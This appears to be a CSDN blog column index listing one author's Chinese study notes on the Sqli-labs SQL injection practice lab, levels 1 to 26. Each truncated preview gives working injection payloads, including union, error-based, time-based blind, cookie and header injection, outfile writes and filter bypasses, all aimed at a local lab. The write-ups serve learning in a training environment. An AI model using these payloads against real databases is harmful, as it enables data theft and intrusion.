![](https://img-blog.csdnimg.cn/5153ac5f0469479d8974f7765c04f1f8.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
Sqlilabs靶场学习记录
之前刷完Sqlilabs没有做笔记,现在打算每天更新一点笔记
dofd
这个作者很懒,什么都没留下…
展开
-
Sqlilabs Less-26
判断是单引号字符注入:?id=1''当接下来进行操作时会发现很多被注释掉了,查看源码黑名单过滤了很多:or、and、空格等等:function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_r原创 2022-03-23 20:23:34 · 541 阅读 · 0 评论 -
Sqlilabs Less25a
根据页面提示,此题是过滤了and和or关键字判断是数字型注入:?id=1 aandnd 1=1--+判断列数:?id=1 oorrder by 3--+爆库:?id=-1 union select 1,2,database()--+爆表:?id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+v爆列:?id=原创 2022-03-18 20:44:47 · 274 阅读 · 0 评论 -
Sqlilabs Less-25
根据网页提示,这道题应该是过滤了AND OR关键字:代码审计,黑名单过滤:绕过方法就是双写爆库:?id=-1' union select 1,2,database()--+爆表:?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+爆列:?id=-1' union select 1,2,group_concat(c原创 2022-03-10 19:09:26 · 179 阅读 · 0 评论 -
Sqlilabs Less-24
这关是二次注入的知识点:二次注入:二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。更新密码的SQL语句是:$sql = "UPDATE users SET PASSWORD='$pass' where username='$us原创 2022-03-10 18:57:48 · 206 阅读 · 0 评论 -
Sqlilabs Less-23
此关看着和前面那些常规注入没什么差别,但发现注入时闭合不了末尾的符号,猜测应该是过滤了–+、#、-- ,查看源码证实了猜想:那么就在id参数里进行注入判断是单引号字符型注入:?id=''爆库:?id='union select 1,2,database()'爆表:?id=' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() or '1'原创 2022-03-10 18:42:48 · 169 阅读 · 0 评论 -
Sqlilabs Less-22
同样是cookie注入判断是双引号字符型注入:爆库:Cookie: uname=IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj爆表:Cookie: uname=IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScj爆列:IiB1bm原创 2022-03-10 18:23:38 · 119 阅读 · 0 评论 -
Sqlilabs Less-21
登录成功后,burpsuite抓包,发现cookie是加了密:去网上找解密工具:接下来的cookie注入也应base64加密爆表:原创 2022-03-10 18:02:56 · 230 阅读 · 0 评论 -
Sqlilabs Less-20
当正确输入后,页面回显cookie,猜测此注入点在cookie:用burpsuite抓包,证明猜测:爆库:Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database())),0)#; 爆表:Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema原创 2022-03-08 19:41:50 · 236 阅读 · 0 评论 -
Sqlilabs Less-19
一顿猜测后,发现在referer后面加入单引号报错,找到注入点查看源代码中的referer相关的SQL语句:$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";爆库:Referer: http://127.0.0.1/sqlilabs/Less-19/',updatexml(1,concat(0x5c,(select database())),1))#爆表原创 2022-03-07 20:51:37 · 141 阅读 · 0 评论 -
Sqlilabs Less-18
进入页面后,页面有提醒IP ADDRESS,如果对http比较熟悉的话,可以联想到http中的referer、XFF、useragent,在注入中,也可以叫异常Method注入。用burpsuite抓包,查看请求头中的信息,发现回显了user-agent的信息,猜测此题的注入点在user-agent在user-agent中加入单引号,证实注入点位置的猜测:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/201001原创 2022-03-07 20:38:55 · 4495 阅读 · 0 评论 -
Sqlilabs Less-17
PASSWORD RESET提醒此关可能是password的注入。查看源码,发现逻辑是需要先证明用户存在才能重置密码,既然我们知道admin用户,就直接注入吧。判断是单引号字符型注入,无回显,用报错注入:uname=admin&passwd=abc'#&submit=Submit爆库:uname=admin&passwd=abc'+and+extractvalue(1,concat(0x5c,(select+database())))#&submit=Submit原创 2022-03-07 20:10:26 · 127 阅读 · 0 评论 -
Sqlilabs Less-16
判断是双引号单括号字符型注入,并且正确是无回显的,用报错注入:uname=admin")#&passwd=&submit=Submit判断列数:uname=admin")+order+by+2#&passwd=&submit=Submit用报错注入发现行不通:uname=admin")+or+extractvalue(1,concat(0x5c,(select+1,database())))#&passwd=&submit=Submit尝试用原创 2022-03-07 19:31:53 · 137 阅读 · 0 评论 -
Sqlilabs Less-15
判断是单引号字符型注入:uname=admin'#&passwd=&submit=Submit判断列数:uname=admin'+order+by+2#&passwd=&submit=Submit原创 2022-03-07 19:07:42 · 135 阅读 · 0 评论 -
Sqlilabs Less-14
判断是双引号字符型注入,并且无回显,用报错注入:uname=admin"#&passwd=&submit=Submit判断列数:uname=admin"+order+by+2#&passwd=&submit=Submit爆库:uname=-admin"+and+updatexml(1,concat(0x5c,(select+database())),1)#&passwd=&submit=Submit爆表:uname=admin"+and+u原创 2022-03-04 20:04:30 · 99 阅读 · 0 评论 -
Sqlilabs Less-13
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入:uname=admin')&passwd=&submit=Submituname=admin')#&passwd=&submit=Submit判断列数:uname=admin')+order+by+2#&passwd=&submit=Submit爆库:uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()原创 2022-03-04 19:50:46 · 275 阅读 · 0 评论 -
Sqlilabs Less-12
burpsuite抓包进行注入判断是双引号单括号字符型注入:uname=admin")#&passwd=&submit=Submit判断列数:uname=admin")+order+by+2#&passwd=&submit=Submit爆库:uname=-admin")+union+select+database(),version()#&passwd=&submit=Submit爆表:uname=-admin")+union+selec原创 2022-03-03 21:01:20 · 194 阅读 · 0 评论 -
Sqlilabs Less-11
这关开始就变成登录画面了先来尝试一个弱口令,用户admin密码admin,登录成功:用burpsuite抓包进行接下来的操作判断出是单引号字符型注入:uname=admin'#&passwd=&submit=Submit判断列数:uname=admin'+order+by+2#&passwd=&submit=Submit爆库:uname=-admin'+union+select+database(),version()#&passwd=&s原创 2022-03-03 20:52:24 · 115 阅读 · 0 评论 -
Sqlilabs Less-10
此关也是延迟注入判断是双引号字符型注入:?id=1"--+爆库:?id=1" and if(length(database()=8),sleep(5),1)--+后面的操作也是延迟注入猜表名列名数据名原创 2022-03-03 16:28:45 · 73 阅读 · 0 评论 -
Sqlilabs Less-9
这关也是延迟注入判断是单引号字符型:?id=1'--+爆库:?id=1' and if(length(database())=8,sleep(5),1) --+后面的操作也是延迟注入去猜表名列名数据名原创 2022-03-03 16:23:48 · 137 阅读 · 0 评论 -
Sqlilabs Less-8
判断是单引号字符型注入:?id=1'和?id=1'--+判断列数:?id=1' order by 3--+用延迟注入方法爆库名的长度:?id=1' union select 1,2,if(length(database())=8,sleep(5),1) -- 反应5s弹出画面:后面的操作也是一步一步延迟注入,去猜表名列名数据名...原创 2022-03-03 16:17:37 · 74 阅读 · 0 评论 -
Sqlilabs Less-7
通过传参发现并没有显示数据,而是显示了关键词Use outfile,那么这道题的思路就是into outfile的注入判断是单引号双括号字符型注入:?id=1'))--+用into outfile爆数据:?id=1')) union select * from users into outfile "D:\\phpstudy_pro\\outfile.txt" --+...原创 2022-03-03 16:06:04 · 165 阅读 · 0 评论 -
Sqlilabs Less-6
同样也是报错注入,是双引号字符型注入爆库:?id=1" and extractvalue(1,concat(0x23,database(),0x23)) --+爆表:?id=1" and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x23)) --+爆列:?id=1" and extractvalu原创 2022-03-02 19:26:50 · 76 阅读 · 0 评论 -
Sqlilabs Less-5
这关用union联合查询是行不通的,所以尝试用报错注入:?id=1' and extractvalue(1,concat(0x23,database(),0x23)) --+爆表:?id=1' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x23)) --+爆列:...原创 2022-03-02 19:16:07 · 322 阅读 · 0 评论 -
Sqlilabs Less-4
通过?id=-1")和?id=-1")--+判断出是双引号单括号注入类型:判断列数:?id=-1") order by 3--+爆库:?id=-1") union select 1,2,database()--+爆表:?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+爆列:?id=-1") union sele原创 2022-03-02 18:53:27 · 61 阅读 · 0 评论 -
Sqlilabs Less-3
通过id=1')--+和id=1')判断为单引号单括号注入类型:爆列数:?id=1') order by 3--+爆库:?id=-1') union select 1,2,database()--+爆表:?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+爆列:?id=-1') union select 1,2,原创 2022-03-01 21:17:31 · 91 阅读 · 0 评论 -
Sqlilabs Less-2
通过?id=1 and 1=1和?id=1 and 1=2判断出是数字型注入类型:判断列数为3:?id=-1 order by 3--+爆库:?id=-1 union select 1,database(),version()--+爆表:?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+爆列:?id=-1 unio原创 2022-03-01 21:05:41 · 111 阅读 · 0 评论 -
Sqlilabs Less-1
less-1联合注入传参给id值时正常回显:127.0.0.1/sqlilabs/Less-1/?id=1判断是单引号字符型类型,注释单引号后正常回显:127.0.0.1/sqlilabs/Less-1/?id=1'127.0.0.1/sqlilabs/Less-1/?id=1' and 1=1--+判断列数为3:127.0.0.1/sqlilabs/Less-1/?id=1' order by 3--+爆数据库、版本:127.0.0.1/sqlilabs/Less-1/?id=原创 2022-03-01 09:53:13 · 144 阅读 · 0 评论